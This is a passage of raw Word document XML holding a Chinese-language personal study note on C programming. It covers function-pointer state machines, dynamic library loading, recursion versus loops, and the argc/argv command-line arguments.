        <w:t>输出：</w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>In State A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618EDF7C" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73"/>
    <w:p w14:paraId="41206FF0" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    currentState = stateB;  // </w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>切换到状态</w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14732681" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    currentState();  // </w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>输出：</w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>In State B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2098CDF3" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73"/>
    <w:p w14:paraId="2121A7C4" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    currentState = stateC;  // </w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>切换到状态</w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232DBE6E" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    currentState();  // </w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>输出：</w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>In State C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEF4C97" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73"/>
    <w:p w14:paraId="735A1365" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A70206" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F059597" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>这个例子展示了如何使用函数指针实现状态之间的转换。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7448B3E5" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00837D73">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>动态库函数加载</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242A4391" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>在某些系统编程环境中，你可能需要在程序运行时动态加载库函数，并通过函数指针调用这些函数。比如在</w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>的动态链接库（</w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>DLL</w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>）或</w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>的共享库（</w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">.so </w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>文件）中，使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve"> dlsym </w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve"> GetProcAddress </w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>函数获取函数的入口地址，并通过函数指针调用它们。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046ED065" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00837D73">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>简化重复代码（函数作为参数传递）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3D6771" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>函数指针可以帮助减少重复代码。对于具有相同结构但行为稍有不同的函数，可以通过传递不同的函数指针来减少代码量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66293903" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73"/>
    <w:p w14:paraId="310D923B" w14:textId="631C4082" w:rsidR="00C55875" w:rsidRDefault="00D17E3E" w:rsidP="00D17E3E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>递归</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9FED35" w14:textId="2B9EA1E6" w:rsidR="00D17E3E" w:rsidRDefault="003E4FD4" w:rsidP="00D17E3E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先明确，其实很多递归函数可以单纯写个循环就可以实现，但是此处论递归。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB8EA7D" w14:textId="190CBE95" w:rsidR="003E4FD4" w:rsidRDefault="003E4FD4" w:rsidP="00D17E3E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我个人想法，递归会产生大量的函数和堆栈调用，因此我在生产活动中倾向于使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>loop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而非递归。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1231C8" w14:textId="049FAF1A" w:rsidR="003E4FD4" w:rsidRDefault="003E4FD4" w:rsidP="00D17E3E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>递归仅在学习时使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71637BF2" w14:textId="77777777" w:rsidR="003E4FD4" w:rsidRDefault="003E4FD4" w:rsidP="00D17E3E"/>
    <w:p w14:paraId="35EDAFFE" w14:textId="2B5B9D00" w:rsidR="00D17E3E" w:rsidRDefault="00D17E3E" w:rsidP="00D17E3E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>递归</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(recursion, recursive)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这是阶乘（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>factorial</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23675782" w14:textId="77777777" w:rsidR="00D17E3E" w:rsidRDefault="00D17E3E" w:rsidP="00D17E3E"/>
    <w:p w14:paraId="4291106F" w14:textId="4E848588" w:rsidR="00D17E3E" w:rsidRDefault="00D17E3E" w:rsidP="00D17E3E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>递归函数特性</w:t>
      </w:r>
      <w:r w:rsidR="00917FE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2A7BE7" w14:textId="2924BEFE" w:rsidR="00917FE8" w:rsidRDefault="00F22ED7" w:rsidP="00917FE8">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数数量：</w:t>
      </w:r>
      <w:r w:rsidR="00917FE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>极端值处返回，如图</w:t>
      </w:r>
      <w:r w:rsidR="00917FE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n&lt;=1</w:t>
      </w:r>
      <w:r w:rsidR="00917FE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就返回</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07509E25" w14:textId="243F22A7" w:rsidR="00917FE8" w:rsidRDefault="00F22ED7" w:rsidP="00917FE8">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">es = </w:t>
      </w:r>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ecursion()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051692B0" w14:textId="3D2E9150" w:rsidR="00F22ED7" w:rsidRPr="00D17E3E" w:rsidRDefault="00F22ED7" w:rsidP="00F22ED7">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:ind w:left="1440" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>递归迭代，传入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>result</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要和传入的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D388BD3" w14:textId="5C36F7AA" w:rsidR="00D17E3E" w:rsidRDefault="00D17E3E" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43C81C9C" wp14:editId="2980AD16">
            <wp:extent cx="2389725" cy="2008508"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8038555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55577" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId88"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2394311" cy="2012363"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC13D16" w14:textId="77777777" w:rsidR="00D17E3E" w:rsidRDefault="00D17E3E" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CDA4F1D" w14:textId="77777777" w:rsidR="00D17E3E" w:rsidRDefault="00D17E3E" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DE0155B" w14:textId="30BD8716" w:rsidR="00350727" w:rsidRDefault="00350727" w:rsidP="00350727">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传递命令行参数</w:t>
      </w:r>
      <w:r w:rsidR="00281FDC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00281FDC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数数量</w:t>
      </w:r>
      <w:r w:rsidR="00281FDC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00281FDC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数值</w:t>
      </w:r>
      <w:r w:rsidR="00281FDC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00281FDC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境变量值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBB9B2E" w14:textId="05102D1C" w:rsidR="003D727C" w:rsidRPr="003D727C" w:rsidRDefault="003D727C" w:rsidP="003D727C">
      <w:r w:rsidRPr="003D727C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>首先注意啊，</w:t>
      </w:r>
      <w:r w:rsidRPr="003D727C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">argv </w:t>
      </w:r>
      <w:r w:rsidRPr="003D727C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="003D727C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> env</w:t>
      </w:r>
      <w:r w:rsidRPr="003D727C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>都存储的是字符串，如果你输入参数是数字，需要转换成数字才行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F08BCA8" w14:textId="18DB041D" w:rsidR="00350727" w:rsidRDefault="00281FDC" w:rsidP="00281FDC">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00281FDC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数数量</w:t>
      </w:r>
      <w:r w:rsidRPr="00281FDC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00281FDC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAAA0E5" w14:textId="7CFFF2EE" w:rsidR="002C14D1" w:rsidRDefault="003F304B" w:rsidP="00350727">
      <w:r w:rsidRPr="003F304B">
        <w:t>argc (Argument Count)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4ACB20" w14:textId="6A5E6B97" w:rsidR="003F304B" w:rsidRDefault="003F304B" w:rsidP="00350727">
      <w:r w:rsidRPr="003F304B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>./my_program arg1 arg2 arg3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7591CBB0" w14:textId="77777777" w:rsidR="003F304B" w:rsidRDefault="003F304B" w:rsidP="003F304B">
      <w:r>
        <w:t>argc will be 4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754018FE" w14:textId="77777777" w:rsidR="003F304B" w:rsidRDefault="003F304B" w:rsidP="003F304B">
      <w:r w:rsidRPr="003F304B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>argv[0]</w:t>
      </w:r>
      <w:r w:rsidRPr="003F304B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the </w:t>
      </w:r>
      <w:r w:rsidRPr="003F304B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>name of the program</w:t>
      </w:r>
      <w:r w:rsidRPr="003F304B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> ("./my_program").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370BC46E" w14:textId="77777777" w:rsidR="003F304B" w:rsidRDefault="003F304B" w:rsidP="003F304B">
      <w:r>
        <w:t>argv[1] is "arg1".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597B890D" w14:textId="77777777" w:rsidR="003F304B" w:rsidRDefault="003F304B" w:rsidP="003F304B">
      <w:r>
        <w:t>argv[2] is "arg2".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DABC0C5" w14:textId="7345906F" w:rsidR="003F304B" w:rsidRDefault="003F304B" w:rsidP="003F304B">
      <w:r>
        <w:t>argv[3] is "arg3".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C208B5C" w14:textId="77777777" w:rsidR="003F304B" w:rsidRDefault="003F304B" w:rsidP="00350727"/>
    <w:p w14:paraId="283AF2A7" w14:textId="7B8386A1" w:rsidR="003F304B" w:rsidRDefault="003F304B" w:rsidP="00350727">
      <w:r w:rsidRPr="003F304B">
        <w:t>argv (Argument Vector)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8AE09E" w14:textId="37CC484E" w:rsidR="003F304B" w:rsidRDefault="003F304B" w:rsidP="00350727">
      <w:r w:rsidRPr="003F304B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>char **argv</w:t>
      </w:r>
      <w:r w:rsidRPr="003F304B">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="003F304B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>char *argv[]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E08696" w14:textId="4CF72E9D" w:rsidR="003F304B" w:rsidRDefault="003F304B" w:rsidP="003F304B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是个存储</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> char* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数组，</w:t>
      </w:r>
      <w:r w:rsidR="00397954">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>char *</w:t>
      </w:r>
      <w:r w:rsidR="00397954">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是字符指针，指向不同字符串的首地址（第一个字符的地址）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E472E4" w14:textId="392D71E2" w:rsidR="003F304B" w:rsidRDefault="003F304B" w:rsidP="003F304B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如我们传参，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>./exe aaa bbb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B27BA38" w14:textId="77777777" w:rsidR="003F304B" w:rsidRDefault="003F304B" w:rsidP="003F304B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序中，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0564EFFB" w14:textId="77777777" w:rsidR="003F304B" w:rsidRDefault="003F304B" w:rsidP="003F304B">
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>har a[]=</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>aaa</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272D348C" w14:textId="4776FA3F" w:rsidR="003F304B" w:rsidRDefault="003F304B" w:rsidP="003F304B">
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>har b[]=</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bbb</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4597BC" w14:textId="7CE3BA82" w:rsidR="003F304B" w:rsidRDefault="003F304B" w:rsidP="003F304B">
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>har c[]=</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ccc</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28463C0E" w14:textId="3552B42A" w:rsidR="003F304B" w:rsidRDefault="00C13B4F" w:rsidP="003F304B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a,b,c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>名字本身就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>char*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，或者说，</w:t>
      </w:r>
      <w:r w:rsidR="00397954" w:rsidRPr="00397954">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>首地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAD1467" w14:textId="0EE9C8EC" w:rsidR="00397954" w:rsidRPr="003F304B" w:rsidRDefault="00397954" w:rsidP="003F304B">
      <w:r w:rsidRPr="00397954">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>char *a = "hello"; char *b = "world"; char *c = "example";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABCD669" w14:textId="77777777" w:rsidR="00397954" w:rsidRDefault="00397954" w:rsidP="00397954">
      <w:r w:rsidRPr="00397954">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">argv </w:t>
      </w:r>
      <w:r w:rsidRPr="00397954">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00397954">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>指针数组</w:t>
      </w:r>
      <w:r w:rsidRPr="00397954">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，也就是存储多个</w:t>
      </w:r>
      <w:r w:rsidRPr="00397954">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00397954">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>char*</w:t>
      </w:r>
      <w:r w:rsidRPr="00397954">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00397954">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的数组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。每个元素都是一个字符指针，指向一个字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6CE34D" w14:textId="197A68D1" w:rsidR="00C13B4F" w:rsidRDefault="00397954" w:rsidP="00397954">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>具体来说，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">argv </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的类型是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> char**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，表示它是“字符指针的指针”。换句话说，它是一个数组，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>其中的每个元素都是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> char*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这些</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
